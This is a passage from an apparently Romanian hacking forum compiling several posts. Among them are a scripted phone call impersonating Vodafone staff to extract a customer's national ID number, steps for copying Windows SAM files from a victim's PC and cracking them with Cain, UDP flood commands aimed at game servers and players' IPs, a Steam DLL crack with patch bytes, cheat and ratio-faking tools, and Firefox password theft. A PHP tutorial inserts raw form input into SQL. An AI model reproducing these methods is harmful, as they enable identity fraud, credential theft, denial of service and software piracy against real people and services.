Seria facturii
Cod client
Numar de telefon
Acum urmeaza partea de inginerie sociala:
Cumparati din piata un telefon mobil, cel mai ieftin posibil, mergeti la un magazin de cartier si cumparati o cartela de Vodafone cu numar (alegeti un numar care sa semene cat mai mult cu 0720222222 intelegeti ideea - cat mai multi de 2).
Acum in functie de datele de pe factura gasiti o fata cu o voce cat mai sexy (nu glumesc) sau un baiat cu o voce autoritara si pe care sa nu-i pufneasca rasul din senin (am mai vazut cazuri) care va suna la numarul de pe factura.
Conversatia ar trebui sa decurga in felul urmator:
Quote:
x: Alo, domnul/doamna Y?
Y: Da, spuneti va rog.
x: Buna ziua/seara, ma numesc Z (un nume cat mai sobru nu "Francfurt Adnan" sau stiu eu ce alta aberatie) operator/operatoare call center Vodafone Bucuresti. O sa va rog sa-mi confirmati niste date inainte.
Y: Spuneti.
x: Sunteti titularul acestui abonament?
Y: Da.
x: Locuiti la adresa cutare?
Y: Da.
x: O sa va rog sa-mi comunicati CNP-ul dumneavoastra.
Y: 1860302320021
x: Vreau sa va intreb daca v-a sosit ultima factura cu seria 123141534653464?
Y: Nu. (wow surpriza )
x: Vrem sa va anuntam ca am intampinat niste dificultati in emiterea ultimelor facturi si ca daca nu aveti datele complete ale acesteia suntem obligati sa vi le comunicam pentru a putea efectua plata. Doriti sa vi le spun acum ?
(de obicei va spune ca nu deoarece oricum primeste un sms cu datele facturii, dar in caz contrar veti furniza aceste date)
Y: Multumesc!
x: Cu placere, va dorim o zi cat mai buna. La revedere!
Y: La revedere!
Acum avem nume, prenume, cod client, numar de telefon si CNP... restul va las pe voi sa-l "ghiciti".
PS= din punct de vedere al securitatii, ce pot face administartorii siteului in cauza pentru a evita acest lucru? (eu am cateva ideei, dar va las pe voi sa va ganditi)

Cum maresti viteza HDD-ului

Cum sa iti imbunatatesti viteza harddiskului:

Trebuie sa aveti minim 256 RAM

Facem urmatori pasi:

START > Run > SYSEDIT.EXE

Maximizati fereastra fisierului system.ini .

In aceasta fereastra coborati aproape de sfarsit,in dreptul liniei pe care se afla [386enh].

Apasati Enter ca sa realizati o linie goala,pe care tastati:
Irq14=4096

Din meniul File al ferestrei alegeti Save.

Acum inchideti fereastra si restartati computerul.

Good Luck !

Aflarea parolelor de windows prin Cain

OK, asta e primul meu tutorial in care am sa prezint cum se pot AFLA parolele userilor de windows. Stiu ca exista si alte metode de aflare sau modificare a lor, mie personal aceasta mi se pare cea mai simpla. Deci daca nu stiti cum se face si v-a schimbat tata parola la cont din cauza ca va jucati prea mult, vreti sa intrati in calculatorul unui prieten sau poate banuiti ca cineva foloseste aceeasi parola si la mail, cititi acest mic tutorial.

ceea ce aveti nevoie:
1. sa nu existe parola de bios
SAU
2. sa fiti logat deja cu un user oarecare.

1 Parola de bios inexistenta sau stiuta

Bootati de pe un live cd de linux, si copiati pe un stick fisierele SAM si SYSTEM din ...\Windows\System32\config\ .Din cauza faptului ca sunt protejate si nu se pot copia, trebuie sa bootati de pe alt sistem de operare. Inchideti calculatorul si reschimbati ordinea de bootare, dupa care plecati la un calculator in care puteti lucra in siguranta, fara a fi prinsi.

Deschideti Cain&Abel, daca nu aveti downloadati de pe net, si in tabul de cracker, la categoria LM&NTML,adaugati fisierele furate de pe calculatorul victima prin optiunea Import hashes from a SAM database.(la boot key adaugati fisierul system).
Odata ce ati adaugat hash-urile, le puteti sparge in modul dorit(brute force, dictionary sau rainbow tables) si voila, aveti parolele.

Trebuie sa mentionez k sistemul de encriptare a parolelor folosit de windows functioneaza in felul urmator: Orice parola este transformata in uppercase letters inainte de a fi encryptata. Apoi,daca parola are mai mult d 7 caractere, va fi impartipa in 2 parti, prima parte continand primele 7 caractere si a 2-a parte restul( hash tip LM), reducand considerabil timpul de spargere. Nu sunt sigur ce tip de encriptare este folosit(cel mai probabil MD5 sau MD4).

2.acces la un cont din calculator

Aduceti p un stick Cain, deja instalat(in caz k nu aveti permisiuni de instalare), rulati si atunci cand adaugati parola, selectati "Import hashes from local system" si procedati la fel. In functie de parola, poate fi sparta instant sau poate fi aproape imposibil de spart. In caz ca aveti intrebari, postati aici sau trimiteti PM.

Deci, sfaturile mele sunt urmatoarele: puneti-va parola de bios,nu sheruiti folderul de Windows sau Documents and settings si aveti grija pe cine lasati la calculator. Have fun!

Counter Strike flood

Din greseala am dat peste un programel ce functioneaza pe porturile UDP (la fel ca si Counter Strike). Ce face acest programel? Trimite foarte multe date in continuu la infinit si provoaca un lag imens. Nu a fost creeat pentru asa ceva dar... am avut eu un feeling ca va functiona daca voi incerca.
Mare atentie: daca il veti folosi de pe pc-ul vostru este posibil sa aveti probleme pentru ca va apare ip-ul real. Si da, functioneaza pe orice server de Counter Strike si probabil are efect asupra oricarei aplicatii ce foloseste protocolul UDP.

Programul il puteti downloada de aici: http://aluigi.altervista.org/testz/udpsz.zip (click dreapta pe link si save as... altfel nu va porni download)
sau de aici: http://rapidshare.com/files/30616931/udpsz.zip.html

Folositi sintaxa urmatoare:

Cod:
udpsz -l 0 hostname.domeniu.ro 27015 55555


Sau daca vreti ca un jucator sa aiba lag mare sau sa nu se poata conecta pe NICIUN server puneti ip-ul lui si port 27005
Exemplu:
Cod:
udpsz -l 0 212.1.1.1 27005 55555


Inlocuiti hostname.domeniu.ro cu serverul in care vreti sa dati sau 212.1.1.1 cu ip-ul jucatorului pe care vreti sa il floodati individual.


Mie mi-a mers

Shell pe gratis

Primul pas e sa descarcam programul putty.Dupaia il executam si acolo la "Host name(or ip adress)" scriem "ssh.unhandledexceptions.com"(scriem fara ghilimele).dupaia dam enter(lasam peporul 22 al ssh).O sa va dea sa scrieti un user voi scrieti "newuser"(fara ghilimele) si la parola la fel ca la user scrieti!!!!Si de aici o sa va dee sa creati userulsi va-ti facut un shell!Hacked by $-Geo-$

Cum sa obtii key pentru Windows 7 Beta 7000

Am gasit tutorialul pe net cand incercam sa obtin o cheie pentru varianta beta. Tutorialul original este la stealthsettings.com.

Microsoft pune la dispozitie doua link`uri de download pentru w7 unul pentru varianta de 32 de biti si altul pentru varianta de 64 de biti.

Link 1 : http://download.microsoft.com/downlo...FRE_EN_DVD.iso

Link 2: http://download.microsoft.com/downlo...FRE_EN_DVD.ISO

Fara renumitul product key de la Microsoft, puteti extinde durata de viata a Windows 7 Beta Trial, de la 30 de zile la 120 de zile, folosind comanda slmgr –rearm.

Puteti obtine un product key pentru Windows 7 Beta daca urmati pasii:

1. Mergeti la technet.microsoft.com si logati-va folosind userul si parola de la hotmail sau live.com (aveti optiunea de Sign In in coltul din dreapta-sus a paginii); daca nu aveti cont va puteti face unul;

2. Copiati (nu dati click!!) unul din linkurile de mai jos (click-dreapta pe link->Copy link location), dati paste in address bar pe pagina de la technet.microsoft.com, apoi dati Enter. Va fi afisat codul care va permite sa inregistrati Windows 7 Beta(evaluation copy).


https://www.microsoft.com/betaexperi...2-ww&LCID=1033

https://www.microsoft.com/betaexperi...4-ww&LCID=1033

Tutorial SQL&PHP

Cum creezi o conexiune la o baza de date MySQL
Inainte de a putea accesa o baza de date, trebuie sa creem acea baza de date..

In limbajul PHP acest lucru il facem cu functia mysql_connect()

Sintaxa:
mysql_connect(servername,username,parola);

Parametrii:
servername Optional. Este serverul pe care se afla baza de date, valoarea default este "localhost"
username Optional. Este userul care are acces de admin pe serverul respectiv. (coincide cu userul de cPanel)
password Optional. Parola user-ului respectiv

_______________________

In exemplul urmator vom stoca conexiunea intr-o variabila ($con) pentru a putea fi folosita pe parcursul scriptului. Atentie: variabilel in php se definesc cu semnul "$" (ex: $variabila. $nume_variabila)

Functia "die" va fi executata daca conexiunea la baza de date/server nu va avea loc. Functia mysql_error() afiseaza motivul erorii.

serverul este: localhost; userul este: acidripp iar parola este: 1234567890

// ineputul scriptului php
$con = mysql_connect("localhost","acidripp","1234567890");
// in acest pas am definit variabila $con
if (!$con)
// daca !(eroare) la conexiune ($con) atunci:
{
die('Nu m-am putut conecta pentru ca: ' . mysql_error());
// die ("moare") si afiseaza mesajul "Nu m-am putut conecta pentru ca: eroare"
}
// codul scriptului
?>
// terminarea scriptului php

________________________

Inchiderea unei conexiuni
Conexiunea se inchide automat cand scriptul ajunge la capat (?>). Pentru a inchide mai devreme conexiunea folosim functia mysql_close():

$con = mysql_connect("localhost","acidrippr","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
// codul scriptului
mysql_close($con);
// inchide conexiunea definita prin variabila $con
?>

_________________________

Crearea unei baze de date noi
Functia CREATE DATABASE este folosita pentru a crea o baza de date noua MySQL.

Sintaxa:
CREATE DATABASE nume_baza_de_date
Pentru a executa comanda trebuie sa folosim functia mysql_query() . Aceasta este folosita pentru a trimite o comanda conexiunii MySQL

__________________________

In exemplul urmator vom crea o baza de date numita "datele_mele" :

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
if (mysql_query("CREATE DATABASE datele_mele",$con))
// creaza baza de date numita datele_mele folosind conexiunea $con
{
echo "Baza de date a fost creata cu succes";
// daca baza de date a fost creata cu succes, va va aparea mesajul "Baza de date a fost creata cu succes"
}
else
// daca nu
{
echo "Baza de date nu a putut fi creata deoarece : " . mysql_error();
// va aparea mesajul "Baza de date nu a putut fi creata deoarece : eroare"
}
mysql_close($con);
?>

Acesta este modul de creare a unei baze de date manual (scriem un script care creaza doar o singura baza de date) pentru a crea mai multe baze de date automat, folosim urmatorul script format dintr-o parte html si una php:

_________________________

Codul html va arata in felul urmator, sa-i zicem make_db.php:

// aici am definit actiunea form-ului ca fiind db_create.php unde db_create.php va fi numele scriptului nostru de mai jos
// deci datele din acest formular vor fi trimise prin metoda post catre un alt fisier numit db_create.php
Numele bazei de date:
// field-ul de introducere a datelor l-am denumit nume_db ca ulterior, in scriptul db_create.php sa definim o variabila ca avand valoarea intrdusa in acest camp.

___________________________

Formularul va arata in felul urmator:
Numele bazei de date:

Sa zicem de dragul tutorialului ca vom introduce valoarea "datele_mele" in acest camp.

____________________________

In momentul cand utilizatorul va da click pe butonul "Submit", datele vor pleca catre db_create.php care arata in felul urmator:

$conectare = mysql_connect("localhost","acidripp","1234567890");
$nume_db = $_POST['nume_db'];
// aici am definit variabila $nume_db care este egala cu valoarea introdusa in campul nume_db din formul html (mai multe despre cum sa folosim formulare/introducem date in php veti invata pe parcursul acestui tutorial)
if (!conectare)
{
die('Conexiunea la mysql nu a avut loc: ' . mysql_error());
}
if (mysql_query("CREATE DATABASE $nume_db";))
// in aceasta sintaxa, folosim modul automat (adica in loc sa scriem in scriptul php direct numele bazei de date) acesta este completat automat de catre variabila $nume_db
{
echo "Baza de date $nume_db a fost creata cu succes";
// daca baza de date a fost creata cu succes, vom primi mesajul "Baza de date datele_mele a fost creata cu succes" (unde datele_mele este string-ul introdus in formularul de creare a bazei html)
}
else
{
echo "Baza de date $nume_db nu a putut fi creata pentru ca: " . mysql_error();
// in cazul in care baza de date nu a putut fi creata, vom obtine un mesaj de genul "Baza de date datele_mele nu a putut fi creata pentru ca: eroare" (unde datele_mele este string-ul introdus in formularul de creare a bazei html)
}
mysql_close($conectare);
?>

___________________________

Crearea unui tabel
Functia CREATE TABLE este folosita pentru a crea un nou tabel intr-o baza de date MySQL.

Sintaxa:
CREATE TABLE nume_tabel
(
nume_coloana1 data_type,
nume_coloana2 data_type,
nume_coloana3 data_type,
....
)

__________________________

In exemplul urmator, vom crea un tabel numit "Useri_forum", care va avea 3 coloane.
Numele coloanelor vor fi "Nickname", "Email" and "Numar_posturi":

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
if (mysql_query("CREATE DATABASE datele_mele",$con))
{
echo "Baza de date a fost creata cu succes";
}
else
{
echo "Baza de date nu a putut fi creata deoarece : " . mysql_error();
}
mysql_select_db("datele_mele", $con);
// functia mysql_select_db() ne permite sa selectam baza de date cu care dorim sa lucram
$sql = "CREATE TABLE Useri_forum
// prin variabila $sql am definit intreaga functie de crearea a tabelului din baza de date
// in acest moment am creat tabelul numit Useri_forum in baza de date datele_mele
(
Nickname varchar(15),
// aceasta este prima coloana numita Nickname care este de tipul varchar cu o lungime maxima de 15 caractere
Email varchar(50),
// aceasta este cea de-a doua coloana numita Email, tot de tipul varchar insa cu o lungime de 50 de caractere
Numar_posturi int
// aceasta este cea de-a treia si ultima coloana numita Numar_posturi care este de tipul int (integer) adica contine numai numere intregi
)";
mysql_query($sql,$con);
// acum scriptul va executa $sql, adica va urma toti pasii de mai sus (executa $sql prin conexiunea $con)
mysql_close($con);
// inchidem conexiunea $con
?>

_________________________

Important: Inainte de a crea un tabel, trebuie sa selectam obligatoriu o baza de date!

Nota: Cand creem un camp de tipul varchar, trebuie OBLIGATORIU sa specificam lungimea acestuia , ex: varchar(15).

_________________________

Numarul curent si functia AUTO INCREMENT
Fiecare camp de date trebuie sa aiba alocat un numar curent (ca in Excel de exemplu)

Numarul curent (primary key) este folosit pentru a identifica fiecare rand dintr-un tabel. Fiecare numar curent trebuie sa fie UNIC intr-un tabel. De asemenea acesta nu are voie sa fie gol deoarece baza de date foloseste aceasta intrare pentru a identifica intrarile din campurile respective.

In exemplul urmator campul nr_crt va fi folosit pentru a numeroata intrarile din baza de date.
Numarul curent este intotdeauna folosit pentru a identifica intrarile din baza de date si este adesea folosit cu functia AUTO_INCREMENT.
AUTO_INCREMENT creste automat valoarea campului de fiecare data cand sunt introduse date noi in baza de date.
Pentru a ne asigura ca, campul numarului curent nu este gol (null) folosim functia NOT NULL pe care o alocam campului respectiv.

Sintaxa:

$sql = "CREATE TABLE Useri_forum
(
nr_crt int NOT NULL AUTO_INCREMENT,
// creem coloana nr_crt de tipul int (numere intregi) care nu este gol (null) iar valoarea acestuia creste cu fiecare intrare noua (AUTO_INCREMENT)
PRIMARY KEY(nr_crt),
// setam campul nr_crt ca fiind numarul curent al tabelului (primary key)
Nickname varchar(15),
Email varchar(15),
Numar_posturi int
)";
mysql_query($sql,$con);

__________________________

Introducerea de date intr-un tabel
Functia INSERT INTO este folosita pentru a introduce date noi intr-un tabel al unei baze de date.

Sintaxa:
Putem scrie functia Insert Into in doua forme:.

Prima metoda nu specifica numele coloanelor unde vor fi introduse datele ci le introduce pe rand in ordinea coloanelor :

INSERT INTO nume_tabel
VALUES (valoarea1, valoarea2, valoarea3,...)

Cea de-a doua forma, defineste atat valorile ce urmeaza a fi introduse cat si coloanele in care sunt introduse:

INSERT INTO nume_tabel (nume_coloana1, nume_coloana2, nume_coloana3,...)
VALUES (valoarea1, valoarea2, valoarea3,...)

Pentru a executa aceste functii, va trebui sa folosim comanda mysql_query().

__________________________

Mai devreme in acest tutorial, am creat un tabel numit "Useri_forum", cu trei coloane numite: "Nickname", "Email" si "Numar_posturi".
Acum vom folosi acelasi tabel in exemplul urmator unde vom adauga doi useri noi:

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
mysql_select_db("datele_mele", $con);
// selectam baza de date si ne conectam la ea
mysql_query("INSERT INTO Useri_forum (Nickname, Email, Numar_posturi)
// introducem in tabelul Useri_forum date in coloanele Nickname, Email si Numar posturi
VALUES ('Kenpachi', 'k3npaci@rstcenter.com', '35')");
// datele pe care le introducem vor fi Nickname=Kenpachi Email=k3npaci@rstcenter.com si Numar_posturi=35
mysql_query("INSERT INTO Useri_forum (Nickname, Email, Numar_posturi)
// repetam operatia de mai sus pentru a introduce date noi facem acest lucru de cate ori avem nevoie
VALUES ('Nytro', 'nytro@yahoo.co.uk', '33')");
// introducem datele in coloane
mysql_close($con);
?>

__________________________

Introducerea de date dintr-un formular intr-o baza de date
Vom crea un formular html prin intermediul caruia vom introduce useri noi in baza de date:

Sa-i spunem add_user.php :

// formularul va trimite datele introduse catre insert.php care le va procesa
Nickname:
Email:
Numar_posturi:

Formularul va arata in felul urmator:
Nickname: Email: Numar_posturi:
Cand veti da click pe butonul submit, datele vor fi trimise catre "insert.php".

Scriptul "insert.php" se va conecta la baza de date si va citi datele introduse in formular prin variabila definita cu functia $_POST:

Mai jos avem codul pentru "insert.php":

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
mysql_select_db("datele_mele", $con);
// se conecteaza la baza de date
$sql="INSERT INTO Useri_forum (Nickname, Email, Numar_posturi)
// definim unde vrem sa introducem datele
VALUES
('$_POST[Nickname]','$_POST[Email]','$_POST[Numar_posturi]')";
// atribuim coloanei Nickname textul introdus in formular in caseta Nickname, etc... folosind functia $_POST
if (!mysql_query($sql,$con))
// daca avem o eroare (!)
{
die('Comanda anulata deoarece: ' . mysql_error());
// scriptul "moare" afisand sursa erorii
}
echo "au fost adaugati 1 utilizatori ";
// in cazul in care nu avem erori, scriptul va afisa un mesaj spunand ca am introdus un user nou
mysql_close($con)
// inchidem conexiunea
?>

____________________________

Afisarea datelor selectate dintr-un tabel (notiune pe care se bazeaza atacul de tip SQLi sau SQL injection)
Functia SELECT este folosita pentru a extrage date dintr-un tabel

Sintaxa:
SELECT nume_coloana(e)
FROM nume_tabel

_____________________________

In exemplul de mai jos vom afisa toate datele din tabelul "Useri_forum" (caracterul * (asterix) extrage toate datele dintr-un tabel):

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
mysql_select_db("datele_mele", $con);
// alegem baza de date
$result = mysql_query("SELECT * FROM Useri_forum");
// alegem sa extragem toate datele din tabelul Useri_forum
while($row = mysql_fetch_array($result))
// atat timp cat avem date de extras...
{
echo $row['Nickname'] . " " . $row['Email'];
// ...scriptul va afisa datele...
echo "
";
// ...fiecare set de date din tabel fiind afisat pe cate un rand nou
}
mysql_close($con);
?>

_____________________________

Exemplul de mai sus stocheaza datele din tabel in variabila $result

Variabila care intra intr-o bucla de afisare atat timp cat nu este nula (nu a terminat de afisat datele din tabel)

Scriptul acesta va trebui sa returneze urmatoarele:

Kenpachi k3npaci@rstcenter.com
Nytro nytro@yahoo.co.uk

_____________________________

Afisarea rezultatelor intr-un tabel html
Exemplul urmator este identic cu cel de sus, doar ca in loc sa le afiseze rand cu rand, le va afisa intr-un tabel

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}

mysql_select_db("datele_mele", $con);

$result = mysql_query("SELECT * FROM Useri_forum");

echo "



";
while($row = mysql_fetch_array($result))
{
echo "";
echo "";
echo "";
echo "";
}
echo "

Nickname	Email
" . $row['Nickname'] . "	" . $row['Email'] . "

";mysql_close($con);
?>

______________________________

Clauza WHERE (la SQLi este folosita pentru a afla datele unui anumit user)
Clauza WHERE este folosita sa extraga datele din tabel strict dupa anumite criterii

Sintaxa:
SELECT nume_coloana(e)
FROM nume_tabel
WHERE nume_coloana operator valoare

_____________________________

In exemplul urmator, vom incerca sa extragem din tabel doar datele utilizatorului Kenpachi:

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
mysql_select_db("datele_mele", $con);
$result = mysql_query("SELECT * FROM Useri_forum
// alegem toate datele (*) din tabelul Useri forum
WHERE Nickname='Kenpachi'");
// care corespund coloanei Nickname cu datele Kenpachi
while($row = mysql_fetch_array($result))
{
echo $row['Nickname'] . " " . $row['Email'];
echo "
";
// afisam rezultatul
}
?>

Rezultatul ar trebui sa arate in felul urmator:

Kenpachi k3npaci@rstcenter.com 35

Daca de exemplu, in loc de coloana "Numar_posturi" am avea o coloana cu parole, in loc de "35" am avea afisat hash-ul perolei aferente contului respectiv.
Sau relativ la exemplul nostru, putem afla sa zicem datele tuturor userilor care au 35 de posturi (sa zicem ca vrem celor cu 35 de posturi sa le trimitem un e-mail de felicitare, etc.)

______________________________

Ordonarea datelor afisate
ORDER BY keyword

Functia ORDER BY este folosita pentru a afisa datele in mod ordonat. Afisarea datelor se face ascendent (ASC) by default, daca dorim sa le afisam descendent (DESC) trebuie sa specificam acest lucru.

Sintaxa:
SELECT nume_coloana(e)
FROM nume_tabel
ORDER BY nume_coloana(e) ASC|DESC

_______________________________

In exemplul urmator, vom sorta userii din tabel dupa numarul de posturi:

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
mysql_select_db("datele_mele", $con);
$result = mysql_query("SELECT * FROM Useri_forum ORDER BY Numar_posturi");
// alegem sa afisam toate datele userilor ordonate dupa numarul de posturi
while($row = mysql_fetch_array($result))
{
echo $row['Nickname'];
echo " " . $row['Email'];
echo " " . $row['Numar_posturi'];
echo "
";
}
mysql_close($con);
?>

Rezultatul ar trebui sa fie urmatorul:

Nytro nytro@yahoo.co.uk 33
Kenpachi k3npaci@rstcenter.com 35

______________________________

Ordonarea dupa doua coloane
Ordonarea se poate face si dupa mai multe coloane, aceasta functie fiind folosita atunci cand sa zicem ca valoarea primei coloane este identica la 2 sau mai multe dintre intrarile din baza de date.

SELECT nume_coloana(e)
FROM nume_tabel
ORDER BY coloana1, coloana2

______________________________

Modificarea datelor intr-o baza de date
Functia UPDATE este folosita pentru a modifica intrarile dintr-o baza de date.

Sintaxa:
UPDATE nume_tabel
SET coloana1=valoarea1, coloana2=valoarea2,...
WHERE coloana_oarecare=valoarea_oarecare

Atentie: Observati folosirea comenzii WHERE, aceasta are rolul de a modifica DOAR coloana care are valoarea X, daca nu vom volosi aceasta functie, TOATE coloanele din tabel vor fi modificate

_______________________________

Pana acum, tabelul nostru Useri_forum arata in felul urmator:

Nickname Email Numar_posturi
Kenpachi k3npaci@rstcenter.com 35
Nytro nytro@yahoo.co.uk 33

In exemplul urmator, vom incerca sa modificam anumite valori:

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
mysql_select_db("datele_mele", $con);
mysql_query("UPDATE Useri_forum SET Numar_posturi = '36'
// alegem sa mofificam valoarea coloanei "Numar_posturi" la 36
WHERE Nickname = 'Kenpachi' AND Email = 'k3npaci@rstcenter.com'");
// DOAR pentru utilizatorul Kenpachi care are adresa de mail k3npaci@rstcenter.com
mysql_close($con);
?>

Dupa ce vom rula acest script, tabelul nostru va arata in felul urmator:

Nickname Email Numar_posturi
Kenpachi k3npaci@rstcenter.com 36
Nytro nytro@yahoo.co.uk 33

______________________________

Stergerea datelor dintr-o baza de date
Functia DELETE FROM.

Sintaxa:
DELETE FROM nume_tabel
WHERE coloana_oarecare = valoarea_oarecare

Atentie: Observati folosirea comenzii WHERE, aceasta are rolul de a modifica DOAR coloana care are valoarea X, daca nu vom volosi aceasta functie, TOATE coloanele din tabel vor fi modificate

_____________________________

Tabelul nostru arata in felul urmator:

Nickname Email Numar_posturi
Kenpachi k3npaci@rstcenter.com 35
Nytro nytro@yahoo.co.uk 33

In exemplul urmator, vom sterge toate intrarile care corespund coloanei Email si au valoarea k3npaci@rstcenter.com

$con = mysql_connect("localhost","acidripp","1234567890");
if (!$con)
{
die('Nu m-am putut conecta pentru ca : ' . mysql_error());
}
mysql_select_db("datele_mele", $con);
mysql_query("DELETE FROM Useri_forum WHERE Email='k3npaci@rstcenter.com'");
// sterge din tabelul Useri_forum toate datele de pe randul in care coloana Email are valoarea k3npaci@blogspot.com
mysql_close($con);
?>

Dupa rularea scriptului, tabelul nostru va arata in felul urmator:

Cs 1.6 Silent Aim(work on steam)

M-am gandit ca poate uni vreti un aim pentru cs 1.6(steam)la care sa nu sara tinta pe cap.(silent)
Sa va spun cum il folositi asa pe mare,deci:
1.Deschizi Cs 1.6 Steam sau No Steam
2.Minimalizezi jocul
3.Pornesti Leis.exe
4.Te reintorci in joc si intr pe un server
5.Apasati INSERT pentru a intra in meniul aimului ca sa setati aimul pe silent
Sa nu abuzati prea mult de el ca nu mai are farmec.

Dowload Link:
http://rapidshare.com/files/191208286/Silent_Aim.rar.html

Cum sa: crack-uim steam

Acest tutorial este creat pentru un "scop" educational.Fara .cue si cintx nu am avea posibilitati.
Hai sa pornim.

De ce ai nevoie ?
OllyDbg (Debugger)
Code:

http://www.ollydbg.de/odbg110.zip

Steam (Putrid Filth)
Code:

http://steampowered.com/download/SteamInstall.exe

Pasul 1 - instalarea steam-ului
Odata ce ai descarcat toate programele necesare, primul lucru e : instalarea steam-ului; presupun ca sti cum se instaleaza ( Atentie! nu-l instalati in folderul cu CS-ul ). Steam-ul se va executa automat, la fel si logarea, dar va trebui sa creezi un cont ( care este gratis ), odata ce ai terminat, logheazate si lasa-l sa-si faca update-ul, pana aici e bine.
Odata ce vezi fereastra ( STEAM ) cu jocuri, iti vei da seama ca nu ai nici un joc, aici incepe cracking-ul.Inchide steam-ul ( Tot ce tine de el ) ,deschide task manager ( CTRL + ALT + DEL ) .

Pasul 2 - PreChek-uri
Update http://www.steampowered.com/v/index.php?area=news
Creeaza un nou fisier numit steam.cfg in interiorul folderului steam si copiaza : "BootStrapperInhibitAll=enable" fara ghilimele. Salveaza-l, probabil te intrebi de ce ai facut asta, pentru a impiedica steam-ul sa faca update si sa distruga munca ta anterioara. Presupun ca ai winrar in PC, arhiveaza steam.dll , daca se produc unele greseli ai de unde sa reincepi .

Pasul 3 - OllyDbg
Extrage si ruleaza ollydbg, dute la file - open.Deasupra la "cancel" vor fi 2 fisiere de tip : .exe si .ddl. Alege .dll, localizeaza si deschide steam.dll. Ollydbg are un plugin : loaddll , sa-r putea sa-ti apara din prima pe ecran,daca doresti sa-l folosesti click pe Ok. Dupa o analiza scurta, vor aparea coduri, aceste coduri se numesc ASM si este , mai pe scurt, .exe-ul descompus intr-un format ( pe care oamenii il pot citi )

Pasul 4 - Deblocand GUI
Lista de jocuri cu steam sunt ascunse intr-o variatiune de coduri, dar "hackerii" au gasit o modalitate . . . in asa fel incat lista sa fie vizibila si jocabila. Unele sunt descarcabile, dar nu ne bagam.
Iata un emulator = 52 8B 44 24 0C C7 00 01 00 00 00 8B 54 24 10 8B 44 24 14 31 C9 89 0A 89 08 89 48 04 89 48 08 88 48 0C B8 01 00 00 00 5A C3

Copiaza emulatorul intr-un notepad, reintoarcete la ollydbg,inchide fereastra precedenta si sa revenim acum la ASM.
Click dreapta - Search for - Label in modulul curent, acesta va afisa o fereastra cu numele functiilor din steam si noi dorim 2 in particular. SteamIsAppSubscribed si SteamIsSubscribed. Dublu click SteamIsAppSubscribed , vei fi dus la o noua fereastra cu coduri, uitete la "PUSH EBP". Click si tine apasat mouse-ul pe aceasta linie si trage-o jos cel putin 14 linii - click dreapta - binary - binary paste. Exact la fel procedeaza cu SteamIsSubscribed.

Pasul 5 - Salvarea
Click dreapta - Copy to Executable - All modifications - Copy All.
Click dreapta pe noua fereastra - Save File - Ok - Yes.
SALVAT!

Am terminat un steam.dll crack-uit.
Metodele difera putin,important e sa ajungi la acelasi rezultat.

Copiati pe ce forum doriti doar nu MODIFICATI.

Cum sa ai internet gratis pe telefon :D

Buna!

pasul1: configurarea pc-ului

Descarcati CCProxy si creeati un server proxy.
Faceti portt forward pe 808 (default pt http)

pasul2: configurarea telefonului

(in cazul meu Sagem my501c...stiu ca e cam demodat dar asta e ops: )

Nume Serviciu: Free Wap (nu conteaza denumirea :P)
Pagina de start: mobile.google.ro (nu conteaza pag de start)
Protocol: HTTP
Conexiunea Pref.: GPRS
Proxy: Folosire: Da
Nume: (nu este necesar in cazul in care folositi Permit All)
Parola: (nu este necesara in cazul in care folositi Permit All)
Adresa Proxy: xxx.xxx.xxx.xxx (aici scrieti ip-ul vostru)
Numar port: (scrieti portul pe care rulati CCProxy..default e 808)
Parametri GSM: x
Parametri GPRS: Nume: (nimic)
Parola: (nimic)
APN: internet
Salvare

Have fun

LE: Cred ca merge si cu proxy public ...dar rata de transfer cam lasa de dorit pe unele...

Site pt toate nevoile dumneavoastra de leecheri:D

1.Faceti account aicea: http://www.sb-innovation.de/register.php
2.Intrati aicea dupa ce va activati contul prin email: http://www.sb-innovation.de/
3.Sper sa va foloseasca deoarece pe site se gasesc de la cliente de torrent modate/hackuite pana la tools precum ratioFaker(care are facut updatu la utorrent 1.8),ratioMaster,mRatio,greedytorrent si multe altele ce vor fi mereu updatate.
4.Testate de mine aproape toate).Merg pe filelist,torrentbits,bittorrents si pe multe alte trackere romanesti.

Cu ocazia acestui post as mai vrea sa cer oricui poate sa-mi dea o invitatie pe iplay si pe torrentleech.Multumesc anticipat(dekdence@gmail.com)

Da-ti pm cu mailul care vrea invitatie pe http://www.opennetwork.ro[tracker romanesc](am 15)

Hack Mozilla Firefox-Password Hooking

Se pot afla parolele stocate in Mozilla Firefox cautand pe huburile odc, dc++, sau chiar pe emule...directoarele sharate de pe "root"


se cauta fisierele signons2.txt si key3.db se baga in decodorul pt. parole firefox si gata.....
fisierele signons2.txt si key3.db sunt localizate in windows XP :
C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\(nume aleatoriu).default\
decodor pt parole firefox cautati pe google sunt multe

metoda 2 fara a folosi un decodor:
-se copie continutul fisierului signons2 in cadrul celui de pe propriul sistem.

Afla parolele folosind firemaster si firepassword:
===============================
History

Version 2.5: 22nd March 2008
Pattern based brute force password recovery method is implemented which reduces the time considerably when certain part of the password is already known. Also minimum length of password can be specified which improves the recovery time greatly.
Usage is simplified by forcing one crack method at a time and providing better meaningful options. Fixed the bug in displaying statistics and now it displays the remaining time accurately based on the current speed which is computed dynamically.

Thanks for your suggestions and feedbacks...

Version 2.2: 8th July 2006
FireMaster source code is released under GPL v2.

Version 2.1: 18th June 2006
Tested successfully with latest version 1.5.0.4 of Firefox.
Statistics display during the operation is improved.

Version 2.0: 25th Feb 2006
